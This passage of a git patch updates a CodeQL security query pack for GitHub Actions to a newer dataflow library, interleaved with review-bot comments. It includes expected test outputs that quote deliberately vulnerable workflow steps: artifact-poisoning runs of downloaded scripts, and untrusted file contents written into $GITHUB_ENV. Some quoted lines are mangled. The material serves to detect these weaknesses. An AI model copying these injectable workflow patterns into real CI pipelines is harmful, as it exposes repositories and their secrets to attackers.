+| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | |
 nodes
 | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step |
 | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n |
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
index f7b4ae7bc117..fdb5beb09aa0 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
@@ -1,84 +1,84 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | -| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | -| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | 
.github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | 
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected
index 193eee3b66cc..a18aa5bdc80e 100644
--- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected
+++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected
@@ -1,17 +1,17 @@ edges -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| 
.github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | +| 
.github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | From ba4dd2b0edfb0493d3e282e4195aba735e4d20a3 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 6 Jun 2024 17:23:10 +0200 Subject: [PATCH 321/707] Update to latest dataflow shared library --- ql/lib/codeql-pack.lock.yml | 12 +- ql/lib/codeql/actions/DataFlow.qll | 9 +- ql/lib/codeql/actions/TaintTracking.qll | 5 +- .../internal/DataFlowImplSpecific.qll | 3 +- .../dataflow/internal/DataFlowPrivate.qll | 39 ++++- .../dataflow/internal/DataFlowPublic.qll | 2 +- .../internal/TaintTrackingImplSpecific.qll | 3 +- .../internal/TaintTrackingPrivate.qll | 8 +- ql/lib/qlpack.gbo | 13 -- ql/lib/qlpack.yml | 8 +- ql/src/codeql-pack.lock.yml | 12 +- ql/test/codeql-pack.lock.yml | 12 +- .../CWE-020/CompositeActionsSinks.expected | 8 +- .../CWE-020/CompositeActionsSources.expected | 6 +- .../CompositeActionsSummaries.expected | 6 +- .../CWE-020/ReusableWorkflowsSinks.expected | 2 +- .../CWE-020/ReusableWorkflowsSources.expected | 6 +- .../ReusableWorkflowsSummaries.expected | 10 +- .../CWE-077/EnvPathInjectionCritical.expected | 12 +- .../CWE-077/EnvPathInjectionMedium.expected | 12 +- .../CWE-077/EnvVarInjectionCritical.expected | 24 +-- .../CWE-077/EnvVarInjectionMedium.expected | 24 +-- .../CWE-094/CodeInjectionCritical.expected | 160 +++++++++--------- .../CWE-094/CodeInjectionMedium.expected | 160 +++++++++--------- .../ArtifactPoisoningCritical.expected | 26 +-- .../CWE-829/ArtifactPoisoningMedium.expected | 26 +-- 26 files changed, 316 insertions(+), 292 deletions(-) delete mode 100644 ql/lib/qlpack.gbo diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 84a6ccba26dc..4b8239b7f6ca 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml 
@@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 1.0.0 codeql/dataflow: - version: 0.1.8 + version: 1.0.0 codeql/ssa: - version: 0.2.8 + version: 1.0.0 codeql/typetracking: - version: 0.2.8 + version: 1.0.0 codeql/util: - version: 0.2.8 + version: 1.0.0 codeql/yaml: - version: 0.1.5 + version: 1.0.0 compiled: false diff --git a/ql/lib/codeql/actions/DataFlow.qll b/ql/lib/codeql/actions/DataFlow.qll index 1e30061bf459..feafe4f68bb0 100644 --- a/ql/lib/codeql/actions/DataFlow.qll +++ b/ql/lib/codeql/actions/DataFlow.qll @@ -2,18 +2,21 @@ * Provides classes for performing local (intra-procedural) and * global (inter-procedural) data flow analyses. */ + +import codeql.Locations + module DataFlow { private import codeql.dataflow.DataFlow private import codeql.actions.dataflow.internal.DataFlowImplSpecific - import DataFlowMake + import DataFlowMake import codeql.actions.dataflow.internal.DataFlowPublic // debug private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific import codeql.dataflow.internal.DataFlowImplConsistency as DFIC - module ActionsConsistency implements DFIC::InputSig { } + module ActionsConsistency implements DFIC::InputSig { } module Consistency { - import DFIC::MakeConsistency + import DFIC::MakeConsistency } } diff --git a/ql/lib/codeql/actions/TaintTracking.qll b/ql/lib/codeql/actions/TaintTracking.qll index 16d5d826aa88..8203a54dfebd 100644 --- a/ql/lib/codeql/actions/TaintTracking.qll +++ b/ql/lib/codeql/actions/TaintTracking.qll @@ -2,9 +2,12 @@ * Provides classes for performing local (intra-procedural) and * global (inter-procedural) taint-tracking analyses. */ + +import codeql.Locations + module TaintTracking { private import codeql.actions.dataflow.internal.DataFlowImplSpecific private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific private import codeql.dataflow.TaintTracking - import TaintFlowMake + import TaintFlowMake } 
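Review bot: `import codeql.Locations` is added as a public, file-scope import in DataFlow.qll, so `Location` is re-exported to every file that imports `codeql.actions.DataFlow`, whereas the same commit uses `private import codeql.Locations` in DataFlowImplSpecific.qll and TaintTrackingImplSpecific.qll. Unless the re-export is intended, `private import codeql.Locations` keeps the module's public surface unchanged and consistent with the internal files; the TaintTracking.qll hunk right after this one has the same public import. The type arguments on `DataFlowMake` and `InputSig` are not visible in this rendering of the patch, so this note covers the import only.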
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll index 2d3b9696ef65..2e3c13f164c2 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll @@ -4,8 +4,9 @@ */ private import codeql.dataflow.DataFlow +private import codeql.Locations -module ActionsDataFlow implements InputSig { +module ActionsDataFlow implements InputSig { import DataFlowPrivate as Private import DataFlowPublic import Private diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index b6b7cd539279..17b29f57025c 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -1,3 +1,4 @@ +private import codeql.util.Unit private import codeql.dataflow.DataFlow private import codeql.actions.Ast private import codeql.actions.Cfg as Cfg @@ -8,6 +9,8 @@ private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.dataflow.FlowSteps private import codeql.actions.dataflow.FlowSources +class DataFlowSecondLevelScope = Unit; + cached newtype TNode = TExprNode(DataFlowExpr e) @@ -78,6 +81,9 @@ class DataFlowCall instanceof Cfg::Node { string getName() { result = super.getAstNode().(Uses).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } + + /** Gets a best-effort total ordering. */ + int totalorder() { none() } } /** @@ -104,6 +110,9 @@ class DataFlowCallable instanceof Cfg::CfgScope { .indexOf(["/action.yml", "/action.yaml"])) else none() } + + /** Gets a best-effort total ordering. */ + int totalorder() { none() } } newtype TReturnKind = TNormalReturn() 
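Review bot: `int totalorder() { none() }` on `DataFlowCall` (hunk `@@ -78,6 +81,9 @@`) and on `DataFlowCallable` (hunk `@@ -104,6 +110,9 @@`) carries the QLDoc "Gets a best-effort total ordering" but never has a result, so the comment promises something the body does not deliver. Say so in the comment, e.g. `/** Gets a best-effort total ordering. Not implemented: this library provides no ordering for calls. */`, or derive an order from the node's location if the shared library needs one. Whether the shared dataflow library tolerates an empty ordering here is not visible from this diff and should be confirmed, especially since `NodeRegion.totalOrder()` later in the same file does return a value. Both enclosing classes continue outside their hunks.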
@@ -158,6 +167,19 @@ newtype TContent = predicate forceHighPrecision(Content c) { c instanceof FieldContent } +class NodeRegion instanceof Unit { + string toString() { result = "NodeRegion" } + + predicate contains(Node n) { none() } + + int totalOrder() { result = 1 } +} + +/** + * Holds if the nodes in `nr` are unreachable when the call context is `call`. + */ +predicate isUnreachableInCall(NodeRegion nr, DataFlowCall call) { none() } + class ContentApprox = ContentSet; ContentApprox getContentApprox(Content c) { result = c } @@ -287,9 +309,13 @@ predicate localFlowStep(Node nodeFrom, Node nodeTo) { } /** - * a simple local flow step that should always preserve the call context (same callable) + * This is the local flow predicate that is used as a building block in global + * data flow. */ -predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } +cached +predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo, string model) { + localFlowStep(nodeFrom, nodeTo) and model = "" +} /** * Holds if data can flow from `node1` to `node2` through a non-local step @@ -366,11 +392,6 @@ predicate clearsContent(Node n, ContentSet c) { none() } */ predicate expectsContent(Node n, ContentSet c) { none() } -/** - * Holds if the node `n` is unreachable when the call context is `call`. - */ -predicate isUnreachableInCall(Node n, DataFlowCall call) { none() } - /** * Holds if flow is allowed to pass from parameter `p` and back to itself as a * side-effect, resulting in a summary from `p` to itself. @@ -400,3 +421,7 @@ predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preserves * This compression is normally done to not show SSA steps, casts, etc. */ predicate neverSkipInPathGraph(Node node) { any() } + +predicate knownSourceModel(Node source, string model) { none() } + +predicate knownSinkModel(Node sink, string model) { none() } 
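Review bot: The new `NodeRegion` class has no QLDoc while the `isUnreachableInCall` predicate directly below it does, so a reader has to work out from `instanceof Unit` and `contains(Node n) { none() }` that there is exactly one region and it holds no nodes. A one-line comment such as `/** A region of nodes. This library does not group nodes by call context, so the single Unit region contains nothing. */` makes that explicit. Leaving `contains` and `isUnreachableInCall` empty appears to be the conservative choice for a security library, since nothing is marked unreachable and no flow is pruned; that should be stated in the comment as the intended behavior rather than left to look like a TODO.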
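Review bot: The new `model` column of `simpleLocalFlowStep` is hard-wired to `""` but the rewritten QLDoc does not mention it, and `knownSourceModel`/`knownSinkModel` in hunk `@@ -400,3 +421,7 @@` are added with no QLDoc at all. Add to the `simpleLocalFlowStep` comment ` * The model column is always the empty string: local steps carry no flow-model provenance.`, and give each of the two new predicates a one-line QLDoc, e.g. `/** Holds if source is a known source from flow model model. Not implemented. */`. This string appears to be what the new `provenance` column in the updated `.expected` files of this commit carries, which is worth noting in the comment so future model-based provenance is wired in here rather than elsewhere.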
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 87e8124db916..96568f86db33 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -178,7 +178,7 @@ class FieldContent extends Content, TFieldContent { predicate hasLocalFlow(Node n1, Node n2) { n1 = n2 or - simpleLocalFlowStep(n1, n2) or + simpleLocalFlowStep(n1, n2, _) or exists(ContentSet c | ctxFieldReadStep(n1, n2, c)) } diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll index c2d51748f20f..2fd062e76607 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll @@ -3,9 +3,10 @@ * Implementation of https://github.com/github/codeql/blob/main/shared/dataflow/codeql/dataflow/TaintTracking.qll */ +private import codeql.Locations private import codeql.dataflow.TaintTracking private import DataFlowImplSpecific -module ActionsTaintTracking implements InputSig { +module ActionsTaintTracking implements InputSig { import TaintTrackingPrivate } diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll index a7e0d23df2b4..b8647339d24c 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll 
@@ -14,12 +14,16 @@ private import codeql.actions.Ast */ predicate defaultTaintSanitizer(DataFlow::Node node) { none() } +// predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { +// any(AdditionalTaintStep s).step(nodeFrom, nodeTo) +// } /** * Holds if the additional step from `nodeFrom` to `nodeTo` should be included * in all global taint flow configurations. */ -predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { - any(AdditionalTaintStep s).step(nodeFrom, nodeTo) +cached +predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo, string model) { + any(AdditionalTaintStep s).step(nodeFrom, nodeTo) and model = "" } /** diff --git a/ql/lib/qlpack.gbo b/ql/lib/qlpack.gbo deleted file mode 100644 index c77f7924c126..000000000000 --- a/ql/lib/qlpack.gbo +++ /dev/null @@ -1,13 +0,0 @@ ---- -warnOnImplicitThis: false -name: seclab/actions-all -version: 0.0.1-dev -groups: actions -extractor: actions -library: true -tests: test -dependencies: - codeql/javascript-all: ^0.8.7 - "codeql/controlflow": "*" - "codeql/dataflow": "*" - "codeql/ssa": "*" diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index bf05e80e0a60..48045dbf6792 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,10 +4,10 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.0.33 dependencies: - codeql/util: ^0.2.0 - codeql/yaml: ^0.1.2 - codeql/controlflow: ^0.1.0 - codeql/dataflow: ^0.1.0 + codeql/util: ^1.0.0 + codeql/yaml: ^1.0.0 + codeql/controlflow: ^1.0.0 + codeql/dataflow: ^1.0.0 dbscheme: yaml.dbscheme extractor: yaml groups: diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 84a6ccba26dc..4b8239b7f6ca 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml 
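Review bot: The commented-out copy of the old two-argument `defaultAdditionalTaintStep` is left in the file between `defaultTaintSanitizer` and the QLDoc of its replacement; it is dead code, and the removed lines of this same hunk already preserve the old form in history. Drop the three `//` lines and extend the QLDoc of the new predicate with ` * The model column is always the empty string: no flow-model provenance is recorded for these steps.`, matching the change made to `simpleLocalFlowStep` in DataFlowPrivate.qll. The `cached` annotation and the `model = ""` conjunct mirror that predicate, so the two should be documented the same way.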
@@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 1.0.0 codeql/dataflow: - version: 0.1.8 + version: 1.0.0 codeql/ssa: - version: 0.2.8 + version: 1.0.0 codeql/typetracking: - version: 0.2.8 + version: 1.0.0 codeql/util: - version: 0.2.8 + version: 1.0.0 codeql/yaml: - version: 0.1.5 + version: 1.0.0 compiled: false diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 84a6ccba26dc..4b8239b7f6ca 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 1.0.0 codeql/dataflow: - version: 0.1.8 + version: 1.0.0 codeql/ssa: - version: 0.2.8 + version: 1.0.0 codeql/typetracking: - version: 0.2.8 + version: 1.0.0 codeql/util: - version: 0.2.8 + version: 1.0.0 codeql/yaml: - version: 0.1.5 + version: 1.0.0 compiled: false diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected index 31e367ac3175..0a5bfe433e91 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected 
@@ -1,8 +1,8 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | -| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | -| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | provenance | | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | provenance | | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | provenance | | +| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | provenance | | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | semmle.label | Uses Step: replace [value] | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected index 6540b1910682..87c185fb5e12 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected 
@@ -1,7 +1,7 @@ edges -| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | -| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | -| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | provenance | | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | provenance | | +| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | provenance | | nodes | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | semmle.label | steps.source.outputs.tainted | | action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected index 063a26bd6ef6..067edb68bb1c 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected 
@@ -1,7 +1,7 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | -| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | -| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | provenance | | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | semmle.label | steps.reflector.outputs.reflected | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected index a45b9acf416d..f2178960774e 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected @@ -1,5 +1,5 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | 